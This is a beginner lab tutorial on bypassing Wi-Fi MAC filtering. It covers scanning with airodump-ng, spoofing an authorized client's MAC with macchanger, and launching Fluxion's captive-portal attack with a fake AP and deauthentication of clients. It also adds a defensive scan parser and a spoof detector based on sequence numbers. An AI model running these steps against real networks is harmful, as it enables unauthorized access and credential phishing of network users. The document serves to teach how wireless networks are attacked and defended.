Bypass MAC Address Filtering during an Attack

Beginner

Introduction

MAC (Media Access Control) address filtering is a network security measure where a router or access point (AP) is configured to accept traffic only from devices with specific, pre-approved MAC addresses. While it can deter casual intruders, this security layer can be bypassed through a technique called MAC spoofing.

In this lab, you will learn the end-to-end process of bypassing MAC address filtering. You will first identify a target network, find the MAC address of an already authorized client, and then change your own wireless adapter's MAC address to impersonate that client. Finally, you will see how this allows a tool like Fluxion to successfully initiate an attack that would otherwise be blocked. This lab is for educational purposes to help you understand network vulnerabilities.

Identify a Network Potentially Using MAC Filtering

In this step, you will install the necessary tools and scan for nearby wireless networks. The first part of any wireless assessment is reconnaissance. We need to see what networks are available and choose a target.

First, let's update the package list and install the aircrack-ng suite, which contains the tools we need for scanning.

sudo apt-get update
sudo apt-get install -y aircrack-ng

Next, you need to put your wireless adapter into "monitor mode." This mode allows the adapter to capture all Wi-Fi traffic in the air, not just traffic addressed to it. In this simulated environment, your wireless adapter is named wlan0.

Run the following command to start monitor mode:

sudo airmon-ng start wlan0

You should see output indicating that monitor mode has been enabled. The command will also create a new virtual interface, typically named wlan0mon.

PHY     Interface       Driver          Chipset

phy0    wlan0           iwlwifi         Intel Corporation Wireless
        (monitor mode enabled on wlan0mon)

Now, use airodump-ng with the new monitor interface (wlan0mon) to scan for all wireless networks in range.

sudo airodump-ng wlan0mon

Let the scan run for a minute. You will see a list of detected access points. For this lab, we will assume our target network has the ESSID (network name) "Target-Net". Press Ctrl+C to stop the scan once you see it.

 CH  6 ][ Elapsed: 10 s ][ 2023-10-27 10:30

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:11:22:33:44:55  -30       10        0    0   6  54e  WPA2 CCMP   PSK  Target-Net
 F8:E4:3B:9A:1B:C0  -65        8        0    0   1  54e  WPA2 CCMP   PSK  Other-Net

From this output, note the BSSID (00:11:22:33:44:55) and CH (channel 6) of our "Target-Net". We will need this information in the next step.

Use 'airodump-ng' to Find a Connected Client's MAC Address

In this step, you will focus your scan on the target network to identify any clients that are already connected. To bypass MAC filtering, you need to impersonate a device that is already on the "allow list." Finding a connected client's MAC address is the key to this.

Using the BSSID and channel you identified in the previous step, run airodump-ng again. This time, you will add options to filter the scan to only show information about our target network. This makes the output cleaner and helps you find clients more easily.

Replace 00:11:22:33:44:55 with the BSSID of your target network and 6 with its channel.

sudo airodump-ng --bssid 00:11:22:33:44:55 -c 6 wlan0mon

The output will be split into two parts. The top part shows information about the Access Point (AP), and the bottom part shows connected clients (stations).

 CH  6 ][ Elapsed: 25 s ][ 2023-10-27 10:32

 BSSID              PWR  RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:11:22:33:44:55  -32  100       30       20    1   6  54e  WPA2 CCMP   PSK  Target-Net

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -40    1- 0      0       15

Look at the bottom section under STATION. This is the MAC address of a client connected to the "Target-Net" AP. In this example, the client's MAC address is AA:BB:CC:DD:EE:FF.

Copy this STATION MAC address. You will use it in the next step to spoof your own MAC address. Once you have the address, you can stop the scan by pressing Ctrl+C.
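The two airodump-ng tables above (the network list and the per-BSSID client list) are the raw material for any wireless inventory, whether you are auditing a network or monitoring your own. The parser below is an added example written for this page; it is not part of the lab or of the aircrack-ng project. It reads the on-screen table layout shown above into structured records and lists which client MACs are associated with a given BSSID. The sample text is constructed in that layout (a third, unassociated station line was added to exercise the "(not associated)" case), and the parser accepts both AP header layouts seen on this page, with and without the RXQ column.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample in the layout airodump-ng prints on screen (not a real
# capture); the third station line was added to show an unassociated client.
SAMPLE_SCAN = """\
 CH  6 ][ Elapsed: 25 s ][ 2023-10-27 10:32

 BSSID              PWR  RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:11:22:33:44:55  -32  100       30       20    1   6  54e  WPA2 CCMP   PSK  Target-Net
 F8:E4:3B:9A:1B:C0  -65   90        8        0    0   1  54e  WPA2 CCMP   PSK  Other-Net

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -40    1- 0      0       15
 F8:E4:3B:9A:1B:C0  11:22:33:44:55:66  -70    1- 1      3        7   Other-Net
 (not associated)   DE:AD:BE:EF:00:01  -80    0- 1      0        2   Target-Net, Guest
"""

MAC = r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}"

# One row of the station table. Rate is printed as "<tx>- <rx>" with a space,
# which is why this table cannot simply be split on whitespace.
STATION_RE = re.compile(
    rf"^(?P<bssid>{MAC}|\(not associated\))\s+"
    rf"(?P<station>{MAC})\s+"
    r"(?P<pwr>-?\d+)\s+"
    r"(?P<rate>\d+e?\s*-\s*\d+e?)\s+"
    r"(?P<lost>\d+)\s+"
    r"(?P<frames>\d+)"
    r"(?:\s+(?P<probe>\S.*\S|\S))?$"
)


@dataclass
class AccessPoint:
    bssid: str
    power: int
    channel: int
    encryption: str
    essid: str


@dataclass
class Station:
    bssid: Optional[str]   # None when airodump-ng prints "(not associated)"
    mac: str
    power: int
    frames: int
    probes: List[str]


def parse_airodump(text: str) -> Tuple[List[AccessPoint], List[Station]]:
    """Parse airodump-ng's on-screen tables into AP and station records."""
    aps: List[AccessPoint] = []
    stations: List[Station] = []
    header: Optional[List[str]] = None   # column names of the table being read
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("CH "):
            continue                      # blank line or the "CH 6 ][ Elapsed" banner
        if line.startswith("BSSID"):
            header = line.split()         # a new table starts; remember its columns
            continue
        if header is None:
            continue
        if "STATION" in header:
            m = STATION_RE.match(line)
            if not m:
                continue
            bssid = None if m.group("bssid").startswith("(") else m.group("bssid").upper()
            probe = m.group("probe") or ""
            stations.append(Station(
                bssid=bssid, mac=m.group("station").upper(),
                power=int(m.group("pwr")), frames=int(m.group("frames")),
                probes=[p.strip() for p in probe.split(",") if p.strip()],
            ))
        else:
            # AP rows: ESSID is the last column and may contain spaces, so split
            # into exactly len(header) fields. Works with or without the RXQ column.
            fields = line.split(None, len(header) - 1)
            if len(fields) != len(header):
                continue
            row = dict(zip(header, fields))
            aps.append(AccessPoint(
                bssid=row["BSSID"].upper(), power=int(row["PWR"]),
                channel=int(row["CH"]), encryption=row["ENC"], essid=row["ESSID"],
            ))
    return aps, stations


def associated_clients(stations: List[Station], bssid: str) -> List[str]:
    """Client MACs airodump-ng showed as associated with the given AP."""
    return sorted(s.mac for s in stations if s.bssid == bssid.upper())


if __name__ == "__main__":
    aps, stations = parse_airodump(SAMPLE_SCAN)
    for ap in aps:
        print(f"{ap.essid:12} {ap.bssid} ch{ap.channel} {ap.encryption}:",
              associated_clients(stations, ap.bssid) or "no clients seen")
```

A monitoring use of the same inventory is to compare `associated_clients` against the MAC allow list configured on the AP. Note what that comparison cannot show: the STATION column is only the address the transmitter claims, so a client impersonating an allow-listed MAC looks identical to the real one here. That is exactly the weakness this lab exploits.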

Use 'macchanger' to Spoof Your Adapter's MAC to the Client's MAC

In this step, you will change your wireless adapter's MAC address to the one you captured from the legitimate client. This process is called MAC spoofing.

First, you need to install macchanger, a simple utility for viewing and manipulating MAC addresses.

sudo apt-get install -y macchanger

Before changing the MAC address, you must stop the monitor mode interface and take the physical wireless interface down.

sudo airmon-ng stop wlan0mon
sudo ifconfig wlan0 down

Now, use macchanger to set the new MAC address. Use the -m option followed by the client's MAC address you noted in the previous step (AA:BB:CC:DD:EE:FF).

sudo macchanger -m AA:BB:CC:DD:EE:FF wlan0

The output will show you the original (Permanent) MAC and confirm the new, spoofed MAC.

Current MAC:   00:0c:29:12:34:56 (unknown)
Permanent MAC: 00:0c:29:12:34:56 (unknown)
New MAC:       AA:BB:CC:DD:EE:FF (unknown)

Finally, bring the wireless interface back up for the changes to take effect.

sudo ifconfig wlan0 up

You can verify that the MAC address has been changed by running ifconfig wlan0 and checking the ether field. Your adapter is now impersonating the legitimate client.
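The AP's allow list never notices the impersonation, because it only checks the claimed source address. A passive wireless monitor can notice it, though: every 802.11 transmitter keeps its own 12-bit sequence counter, so when two radios send with the same MAC (the real client and the spoofed adapter), the sequence numbers seen for that address jump back and forth between two counters instead of advancing steadily. The detector below is an added example written for this page, not part of the lab or of any tool it uses; it implements that well-known sequence-number heuristic over constructed frames (no real capture), and the tolerance `MAX_FORWARD_GAP` and the alert threshold are assumed policy values to tune per site.

```python
from dataclasses import dataclass, field
from typing import Dict, List

SEQ_MODULO = 4096        # the 802.11 Sequence Control sequence number is 12 bits
MAX_FORWARD_GAP = 64     # assumed tolerance for frames the monitor missed; tune per site


@dataclass
class Frame:
    """The two fields of a captured 802.11 frame this heuristic needs."""
    src: str   # transmitter (source) MAC address
    seq: int   # sequence number from the Sequence Control field


@dataclass
class SpoofDetector:
    last_seq: Dict[str, int] = field(default_factory=dict)
    anomalies: Dict[str, int] = field(default_factory=dict)

    def observe(self, frame: Frame) -> bool:
        """Record one frame; return True if its sequence number does not follow
        the previous frame seen from the same source MAC."""
        prev = self.last_seq.get(frame.src)
        self.last_seq[frame.src] = frame.seq
        if prev is None:
            return False                   # first frame from this MAC: nothing to compare
        gap = (frame.seq - prev) % SEQ_MODULO
        # gap == 0 is a retransmission, a small gap is normal progression (including
        # wrap-around at 4095 -> 0); a large gap means a second counter is in use.
        if gap <= MAX_FORWARD_GAP:
            return False
        self.anomalies[frame.src] = self.anomalies.get(frame.src, 0) + 1
        return True


def count_anomalies(frames: List[Frame]) -> Dict[str, int]:
    """Run the detector over a frame list and return anomalies per source MAC."""
    det = SpoofDetector()
    for f in frames:
        det.observe(f)
    return dict(det.anomalies)


def suspicious_sources(counts: Dict[str, int], threshold: int) -> List[str]:
    """MACs whose anomaly count reaches the threshold (assumed policy value)."""
    return sorted(mac for mac, n in counts.items() if n >= threshold)


def build_sample_frames() -> List[Frame]:
    """Constructed traffic (not a capture): the legitimate client AA:BB:... and
    a second radio using the same MAC transmit alternately, each with its own
    counter, while 11:22:... is a normal client with a single counter."""
    spoofed_mac = "AA:BB:CC:DD:EE:FF"
    honest_mac = "11:22:33:44:55:66"
    frames: List[Frame] = []
    for i in range(20):
        frames.append(Frame(spoofed_mac, 100 + i))    # legitimate client's counter
        frames.append(Frame(spoofed_mac, 3000 + i))   # impersonating radio's counter
        frames.append(Frame(honest_mac, 500 + i))
    return frames


if __name__ == "__main__":
    counts = count_anomalies(build_sample_frames())
    print("sequence-number anomalies per MAC:", counts)
    print("flagged:", suspicious_sources(counts, threshold=5))
```

Two caveats for real captures (taken on a monitor-mode interface such as the lab's wlan0mon): QoS data frames keep a separate sequence counter per traffic class, so a production detector keys its state on (source MAC, TID) rather than MAC alone, and a client that resets or roams produces a one-off jump. Treat a sustained stream of anomalies for one address as a wireless-IDS signal to investigate, not as proof by itself.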

Launch the Fluxion Attack with the Spoofed MAC Address

In this step, you will launch an attack tool called Fluxion. The goal is to demonstrate that with your spoofed MAC address, the tool can successfully associate with the target AP, a step that would fail if the network were using MAC filtering and you had a random, unauthorized MAC.

First, you need to download Fluxion from its official GitHub repository.

git clone https://www.github.com/FluxionNetwork/fluxion.git

Navigate into the newly created fluxion directory.

cd fluxion

Now, launch the Fluxion script with sudo privileges.

sudo ./fluxion.sh

Fluxion is an interactive script. You will be prompted to make several selections. Follow these prompts:

  1. Language Selection: Press Enter to select English (or type the corresponding number).
  2. Wireless Adapter Selection: Fluxion will detect your wlan0 adapter. Select it by typing its number and pressing Enter.
  3. Channel Selection: Choose the option to scan for networks (e.g., "All channels scanner").
  4. Target Selection: After the scan, a list of networks will appear. Find "Target-Net" and type its number, then press Enter.
  5. Attack Selection: Choose an attack. For this demonstration, select the Captive Portal attack.
  6. Handshake Check: Fluxion will check for a valid handshake file. Choose the option to skip or perform a deauthentication attack to capture one.

The critical part of this step is observing that Fluxion can proceed through these initial stages. Because your MAC address is now on the AP's "allow list," Fluxion's attempts to communicate and associate with the AP will succeed.

Verify the Attack Proceeds Past the Association Stage

In this final step, you will observe the output from Fluxion to confirm that the MAC spoofing was successful. You don't need to complete the full attack; the goal is simply to verify that you have bypassed the initial security check.

After you select the Captive Portal attack in Fluxion, the tool will begin its process. You should see messages in the terminal indicating that it is:

  • Creating a fake Access Point (AP).
  • Attempting to deauthenticate clients from the real AP.
  • Waiting for a client to connect to the fake AP.

The key observation here is the absence of an "association failed" error. If you had tried to run this attack without spoofing your MAC address, Fluxion would likely fail at the very beginning because the target AP would reject any connection attempts from your unauthorized MAC address. The fact that the attack proceeds to the stage of setting up a fake AP and deauthenticating clients is proof that you have successfully bypassed the MAC filter.

Once you have seen these messages and confirmed the attack is proceeding, you can safely stop the script by pressing Ctrl+C in the terminal.

As a final piece of good practice, you should always restore your adapter's original MAC address after you are finished.

First, bring the interface down:

sudo ifconfig wlan0 down

Use macchanger with the -p (permanent) option to restore the original hardware MAC address.

sudo macchanger -p wlan0

Finally, bring the interface back up.

sudo ifconfig wlan0 up

You have now successfully demonstrated how to bypass MAC filtering and cleaned up by restoring your original configuration.

Summary

In this lab, you learned and carried out the technique of bypassing MAC address filtering on a Wi-Fi network.

You started by using the aircrack-ng suite to scan for networks and identify a target. You then focused on that target with airodump-ng to find the MAC address of an already authorized client. Using macchanger, you spoofed your wireless adapter's MAC address to impersonate that client. Finally, you launched the Fluxion tool and verified that the attack could proceed past the initial association stage, proving that the MAC filtering security measure had been effectively bypassed.

This hands-on experience demonstrates a common vulnerability in network security and highlights the importance of using stronger security measures, such as WPA2/WPA3 with a strong password, instead of relying on easily spoofed identifiers like MAC addresses.